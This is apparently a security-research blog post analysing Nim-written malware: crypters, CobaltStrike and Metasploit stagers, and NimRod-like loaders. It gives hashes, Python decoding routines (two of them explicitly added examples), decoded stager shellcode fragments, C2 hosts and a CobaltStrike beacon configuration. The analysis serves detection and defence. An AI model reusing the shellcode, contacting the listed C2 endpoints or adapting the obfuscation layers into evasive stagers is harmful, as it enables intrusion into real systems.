Investigation into the state of Nim malware
Jason Reaves | Walmart Global Tech Blog | Mar 1 · 7 min read
By: Jason Reaves and Joshua Platt
Whenever malware is found to be written in a new programming language, AV detections are generally lacking, because the new language produces bytecode sequences that are relatively unknown, along with strings of data that can throw off static heuristic models. It also usually causes stress within the malware reverse engineering community, as was seen initially with GoLang malware.
Enter Nim[1], which was used to create a repository of code examples leveraging Nim for red team related utilities. Malware developers take notice of anything that can be leveraged for more infections, including compiled programming languages that bypass AV detections. This was brought more to light recently in a report we put out covering a new loader used by the TrickBot cybercrime group that was written in Nim, NimRod[5], much the same as they use BazarLoader[3]; some of the concepts or development requirements for Baza could have been imposed on NimRod, since both are leveraged as loaders primarily to deliver CobaltStrike[4].
This left me wondering what else was out there in the world of Nim malware; this report is a compilation of my findings.

Nim Crypter

First we have what is possibly an adversary leveraging code from OffensiveNim to conceal an onboard encrypted binary, something we would normally refer to as a Crypter in the malware world: a tool designed to bypass AV by wrapping a layer around a binary that would otherwise be detected.
MD5 : 507500d9c55ac4db55c7ea4adfe1380b SHA-1 : 32dbaa97622f51a05cd9ad358837242985e6abdb SHA-256 : f76e2d411831c549ce1111d93ebb724da1835114d91a5c7e6c5e5651da1106e5
This uses publicly available code from OffensiveNim, but also step-by-step instructions[6,7] that are available for how to use the code to crypt up and deliver a .NET assembly. The standard method in the repo involves storing the file AES encrypted and Base64 encoded, so we can reverse the process to statically recover the onboard file (Python 2 session; b holds the Base64 blob carved from the sample):
>>> from Crypto.Cipher import AES
>>> from Crypto.Util import Counter
>>> import hashlib
>>> import base64
>>> import binascii
>>> k = hashlib.sha256('TARGETDOMAIN').digest()    # AES key is the SHA-256 of the domain string
>>> b = base64.b64decode(b)                         # b: Base64 blob carved from the sample
>>> c = base64.b64decode('VcVWbuX3TM+koCBd+2YHrw==')  # stored IV, used as the CTR initial value
>>> int(binascii.hexlify(c),16)
114009015196344035509101775155687196591L
>>> ctr = Counter.new(128, initial_value=114009015196344035509101775155687196591)
>>> aes = AES.new(k, AES.MODE_CTR, counter=ctr)
>>> aes.decrypt(b)
'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.\r\r\n$\x00\x00\x00\x00\x00\x00\x00PE\x00\x0
In this case it is loading a GruntHTTP stager:
https://yeshua.vip:443
2E4D5B0FEE977939ED85AAFB89CC40F8B2350385
VXNlci1BZ2VudA==,Q29va2ll
TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNDEuMC4yMjI4LjAgU2FmYXJpLzUzNy4zNg==,QVNQU0VTU0lPTklEPXtHVUlEfTsgU0VTU0lPTklEPTE1NTIzMzI5NzE3NTA=
L2VuLXVzL2luZGV4Lmh0bWw=,L2VuLXVzL2RvY3MuaHRtbA==,L2VuLXVzL3Rlc3QuaHRtbA==
i=a19ea23062db990386a3a478cb89d52e&data={0}&session=75db-99b1-25fe4e9afbe58696-320bea73
MD5 : e65a69688e0c75f41f1388c82e1069ba SHA-1 : a15573c6dabadce1dc3a5ebb1f135b64025987d4 SHA-256 : 311e49ca50489eb9c9127e42e4ab2c39d5311754e9475236a5431d917774dccf
Another usage of OffensiveNim code as a crypter, but this time with direct references to SharpKatz, which was explained in the PPN GitHub repo[6].

Decoding out the onboard file in the same manner leaves us with SharpKatz:
Users\chippy\Desktop\HACKING_RESOURCES\SharpKatz-master\SharpKatz\obj\Debug\SharpKatz.pdb

Nim Stagers

A common area where we saw GoLang being used once malware developers started noticing it was stagers for Meterpreter or CobaltStrike; the same pattern holds true for Nim as well.
MD5 : e65a69688e0c75f41f1388c82e1069ba SHA-1 : a15573c6dabadce1dc3a5ebb1f135b64025987d4 SHA-256 : 311e49ca50489eb9c9127e42e4ab2c39d5311754e9475236a5431d917774dccf
The shellcode is in the clear and appears to be Metasploit code for downloading and executing a next stage. Even with the shellcode in the clear, detections at time of upload to VirusTotal were 4/66.
Here we can see that the next stage will be pulled from 45.43.2.118, but this was down at the time I discovered the file; according to VirusTotal data the IP address was at one point associated with a CobaltStrike C2.
Photo credit: VirusTotal
MD5 : 78a94df84f31c12a428cbdeeb179dc6b SHA-1 : 6f8928478f77fba483e0c3bd77610f996da97e9a SHA-256 : 18d1776dae59d2b4d083cb204cae2ab73f50baac07bd69068343a6cc523c0de2
This is also a stager, but this time the shellcode is obfuscated; the first layer is Base64.
After Base64 decoding, the sample treats the first 256 bytes as a lookup table to deobfuscate the remaining data.
>>> tbl = a[:256]                # a holds the Base64-decoded blob; first 256 bytes are the table
>>> data = bytearray(a[256:])    # every remaining byte is an index into the table
>>> out = ""
>>> for i in range(len(data)):
...     out += tbl[data[i]]
...
>>> out
‘xfcHx83xe4xf0xe8xc8x00x00x00AQAPRQVH1xd2eHx8bR`Hx8bRx18Hx8bR Hx8brPHx0fxb7JJM1xc9H1xc0xac{xc6xe5xb8xefx828xa9x9bJxc7&g3xf9xbexcfQxa1xf5Zx00Axbexf0xb5xa2Vxffxd5H1xc9xbax00x00@x00Axb8x00x10x00x00Axb9@x00x00x00AxbaXxa4Sxe5xffxd5Hx93SSHx89xe7Hx89xf1Hx89xdaAxb8x00 x00x00Ix89xf9Axbax12x96x89xe2xffxd5Hx83xc4 x85xc0txb6fx8bx07Hx01xc3x85xc0uxd7XXXHx05x00x00x00x00Pxc3xe8x9fxfdxffxff192.168.1.10x00x124Vx’
The decoded data is CobaltStrike stager shellcode with a local IP address. We were able to pivot on this shellcode decoding technique to find another stager using the same decoding mechanism with a live C2:
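A Python 3 version of the table-substitution decoding above, added here as an example rather than taken from the post or the samples. It also adds a stager-prefix sanity check and a C2 extraction step, and builds its own constructed blob the way the packer would (a seeded random table, a fake stager-like buffer); none of the data is from the analysed files.

```python
import base64
import random
import re
from typing import List, Tuple

# Added example (not code from the original post): the first 256 bytes of the
# Base64-decoded blob are a lookup table and every remaining byte is an index
# into it. build_constructed_sample() fabricates such a blob for testing.


def decode_table_blob(b64_blob: str) -> bytes:
    """Base64 decode, then map each payload byte through the 256-byte table."""
    raw = base64.b64decode(b64_blob)
    if len(raw) < 256:
        raise ValueError("blob is shorter than the 256-byte lookup table")
    table, data = raw[:256], raw[256:]
    return bytes(table[b] for b in data)


def looks_like_cs_stager(shellcode: bytes) -> bool:
    """Sanity check on decoded bytes: x64 CobaltStrike/Metasploit stagers open with
    cld; and rsp,-16; call (fc 48 83 e4 f0) and x86 ones with cld; call (fc e8)."""
    return shellcode.startswith(b"\xfc\x48\x83\xe4\xf0") or shellcode.startswith(b"\xfc\xe8")


def extract_ipv4_hosts(shellcode: bytes) -> List[str]:
    """Pull NUL-terminated dotted-quad strings (the stager's C2 host) out of the bytes."""
    return [m.decode() for m in re.findall(rb"((?:\d{1,3}\.){3}\d{1,3})\x00", shellcode)]


def build_constructed_sample() -> Tuple[str, bytes]:
    """Encode a constructed stager-like buffer with a seeded random table. The
    encoder needs the inverse table; the decoder only needs the forward one."""
    plain = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00AQAPRQVH1\xd2" + b"192.168.1.10\x00"
    table = bytes(random.Random(7).sample(range(256), 256))
    inverse = {v: i for i, v in enumerate(table)}
    encoded = bytes(inverse[b] for b in plain)
    return base64.b64encode(table + encoded).decode(), plain


if __name__ == "__main__":
    blob, expected = build_constructed_sample()
    decoded = decode_table_blob(blob)
    print(decoded == expected, looks_like_cs_stager(decoded), extract_ipv4_hosts(decoded))
```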
MD5: 76c7bb63fb46ecd31bee614e2760fc2f
SHA-1: 8dcc70fcbeb7231986fe9420f7cd8bc8a1223ddf
SHA-256: d7cdf7bca8c90d21e64b0c790ce5aa9124623dd2788088c81160703e00ff2052
The shellcode stager this decodes out goes to:
35.241.81.15/AdhP
Which contains a shellcode wrapped CobaltStrike beacon when downloaded.
{'ProcInject_Execute': 'x06x00Bx00x00x00x06ntdllx00x00x00x00x13RtlUserThreadStartx00x01x08x03x04',
 'PROXY_BEHAVIOR': '2',
 'PROTOCOL': '8',
 'SPAWNTO_X64': '%windir%\sysnative\dllhost.exe',
 'SLEEPTIME': '45000',
 'KillDate': '0',
 'C2_VERB_GET': 'GET',
 'ProcInject_StartRWX': '4',
 'DOMAINS': '35.241.81.15,/jquery-3.3.1.min.js',
 'HostHeader': '',
 'ProcInject_Prepend_x86': 'x02x90x90',
 'ProcInject_MinAllocSize': '17500',
 'ProcInject_UseRWX': '32',
 'MAXGET': '1403644',
 'USERAGENT': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',
 'PORT': '443',
 'UsesCookies': '1',
 'ProcInject_AllocationMethod': '1',
 'PUBKEY': '30819f300d06092a864886f70d010101050003818d003081890281810088c000e1ce2599a1d5b93de6ed952dae15bb46b769862fe97fbce12b48bd790b3f63c07eb1f5596539aabaca02166cd8aad7182e10138553a9d3335af785e8bd2c6f55707faeb8db13800ae9aa7ce11cf23abf887d12296747a14329d8a35599ea35c9d8a97d3ac5b0ed69cc3a8daf534f241d6415e15e16e259ad05abad90a10203010001',
 'C2_POSTREQ': "[('_HEADER', 0, 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('_HEADER', 0, 'Referer: http://code.jquery.com/'), ('_HEADER', 0, 'Accept-Encoding: gzip, deflate'), ('BUILD', ('MASK',))]",
 'WATERMARK': '1359593325',
 'textSectEnd': '177872',
 'bStageCleanup': '1',
 'SPAWNTO_X86': '%windir%\syswow64\dllhost.exe',
 'C2_REQUEST': "[('_HEADER', 0, 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('_HEADER', 0, 'Referer: http://code.jquery.com/'), ('_HEADER', 0, 'Accept-Encoding: gzip, deflate'), ('BUILD', ('BASE64URL',)), ('HEADER', 0, 'Cookie')]",
 'CRYPTO_sCHEME': '0',
 'ITTER': '37',
 'C2_VERB_POST': 'POST',
 'SPAWNTO': '',
 'bCFGCaution': '0',
 'SUBMITURI': '/jquery-3.3.2.min.js'}
MD5 : bde13c029b14a133b13fcd875af3567c SHA-1 : e57396cfeac27076f2660c36e650d24bd37ca804 SHA-256 : 993ea418f841fce636986d3e61aed7ac2b3a03c7d3e8a539ac5c81c7b85637f5
This also turns out to be a CobaltStrike stager with a local IP address, but here the data is encrypted using 3DES, with the key stored on top of the encrypted data:
The last stager we are going to look at has a few more layers of encoding on the stager shellcode, but it also currently has only 5 detections on VirusTotal.
MD5 : 0a7b2ae58ac40dfd7a972a6cff81315a SHA-1 : df466c910cd0f6b6672d2e4396b84fc071cdc11f SHA-256 : 590e2308bd76873a1a518e162bbf10173a0bc69a0380c606d0f10c058cbffb0e
The XOR key for the shellcode is itself stored single-byte XOR encoded:
Then the encoded stager shellcode is copied:
The encoded shellcode and XOR key are then passed to a function named showStr:
This function does the actual decoding of the shellcode:
The steps are Base64 decode -> XOR -> unhexlify, which leaves us with another stager shellcode blob:
xfcxe8x89x00x00x00`x89xe51xd2dx8bR0x8bRx0cx8bRx14x8br(x0fxb7J&1xff1xc0xacx00Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rnAccept-Language: en-US,en;q=0.5rnHost: code.jquery.comrnAccept-Encoding: gzip, deflaternUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36rnx00x1d-Cx81x94xc82xafx1exe0x97!x00hxf0xb5xa2Vxffxd5j@hx00x10x00x00hx00x00@x00WhXxa4Sxe5xffxd5x93xb9xafx0fx00x00x01xd9QSx89xe7Whx00 x00x00SVhx12x96x89xe2xffxd5x85xc0txc6x8bx07x01xc3x85xc0uxe5Xxc3xe8xa9xfdxffxff192.168.161.2x00Qtxbfm’
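The showStr layering described above, written out as an added Python example (not the sample's code). The post states that the key is stored single-byte XOR encoded and that decoding runs Base64 decode -> XOR -> unhexlify; this example assumes, beyond that, that the key is a multi-byte string applied as a repeating XOR and that the single protecting byte is known from the binary. All inputs are constructed.

```python
import base64
import binascii
from typing import Tuple

# Added example (not the sample's code). Assumptions not stated in the post:
# the shellcode key is multi-byte and applied as a repeating XOR, and the
# single byte that protects the stored key is known. Test data is constructed.


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; a one-byte key gives plain single-byte XOR."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(encoded_key: bytes, key_byte: int) -> bytes:
    """Undo the single-byte XOR that protects the stored shellcode key."""
    return xor_bytes(encoded_key, bytes([key_byte]))


def show_str(encoded_shellcode: str, key: bytes) -> bytes:
    """Base64 decode -> XOR -> unhexlify, in the order the sample's showStr uses."""
    layer1 = base64.b64decode(encoded_shellcode)
    layer2 = xor_bytes(layer1, key)
    return binascii.unhexlify(layer2)


def encode_like_sample(shellcode: bytes, key: bytes, key_byte: int) -> Tuple[str, bytes]:
    """Inverse of show_str (hexlify -> XOR -> Base64), used only to build test data.
    Returns the encoded shellcode and the single-byte-XOR-encoded key."""
    blob = base64.b64encode(xor_bytes(binascii.hexlify(shellcode), key)).decode()
    return blob, xor_bytes(key, bytes([key_byte]))


def demo() -> bytes:
    # Constructed x86 stager-like prefix plus a private IP string; not sample data.
    shellcode = b"\xfc\xe8\x89\x00\x00\x00`\x89\xe5" + b"192.168.161.2\x00"
    blob, encoded_key = encode_like_sample(shellcode, b"NimStagerKey", 0x5A)
    return show_str(blob, recover_key(encoded_key, 0x5A))


if __name__ == "__main__":
    print(demo())
```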
Loaders

Aside from NimRod, there appear to be other loader malware families written in Nim that share code similarity with NimRod in their string encoding technique; whether this means they are based on similar code bases or were developed by the same person is unclear.
MD5 : 325a71e33559a634ec08bccd0d3898f8
SHA-1 : de3a15fb7b7571cc697b8c262e56e4be31c74302
SHA-256 : bdf20694e32d8305b859bf0d36b62078fd9ec330ece3f37e8192ff738165faee
The CAB file contains two files, both written in Nim, and both contain the same string encoding routine as NimRod.
Date Time Attr Size Compressed Name
2021-01-09 00:22:40 ….A 112248 Loader.exe
2021-01-09 00:22:14 ….A 302200 reader_sl.exe.